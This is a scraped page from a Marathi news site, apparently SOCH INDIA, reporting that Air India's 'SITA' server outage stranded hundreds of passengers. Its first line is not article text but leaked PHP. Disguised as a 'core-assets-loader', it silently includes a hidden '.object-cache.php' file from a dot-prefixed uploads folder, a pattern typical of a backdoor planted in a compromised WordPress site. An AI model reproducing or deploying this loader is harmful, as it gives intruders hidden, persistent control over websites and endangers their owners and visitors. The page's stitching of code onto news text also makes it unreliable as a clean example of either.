add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); एअर इंडियाचा ‘सिता’ सर्व्हर डाऊन; देशभरातील शेकडो प्रवाशी खोळंबले – SOCH INDIA
Menu

एअर इंडियाचा ‘सिता’ सर्व्हर डाऊन; देशभरातील शेकडो प्रवाशी खोळंबले

nobanner

एअर इंडिया या सरकारी विमान कंपनीच्या विमानांची तांत्रीक बाब सांभाळणारा ‘सिता’ सर्व्हर डाऊन झाल्याने देशभरात एअर इंडियाची विमान ठप्प झाली आहे. याचा फटका शेकडो प्रवाशांना बसला असून त्यांचा चांगलाच खोळंबा झाला आहे. चेक इनसह इतर प्रक्रियाही पूर्ण होण्यात अडचण येत असल्याने भारतासह परदेशातील एअर इंडियाच्या प्रवाशांना अडचणीला सामोरे जावे लागत आहे.

शनिवारी (दि.२७) पहाटे साडेतीन वाजल्यापासून हे सर्व्हर डाऊन झाले आहे. तेव्हापासून अद्यापपर्यंत प्रवाशी विमानतळांवर अडकून पडले आहेत. दिल्लीच्या इंदिरा गांधी आंतरराष्ट्रीय विमानतळावर प्रवाशांची मोठी गर्दी झाली आहे.

‘सिता’ सर्व्हर हे एअर इंडियाच्या आयटी आणि कम्युनिकेशन विभागाची अत्याधुनिक यंत्रणा आहे. सर्व्हर डाऊन झाल्यामुळे प्रवाशांना चेक इन करता येत नाहीए, त्याचबरोबर इतरही तांत्रिक बाबी पूर्ण होण्यास अडचणी येत आहेत. यामुळे एअर इंडियाच्या दिल्ली आणि मुंबई विमानतळांसह जगभरातील प्रवाशांना या अडचणीला तोंड द्यावं लागत आहे. या प्रवाशांना कुठलीही ठोस माहिती मिळत नसल्याने ते वैतागले आहेत.

दरम्यान, एअर इंडियाच्या कर्मचाऱ्यांनाही हा सर्वर कधीपर्यंत सुरु होईल याची अधिकृतरित्या माहिती मिळत नसल्याने गोंधळाची परिस्थिती निर्माण झाली आहे.

Leave a Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>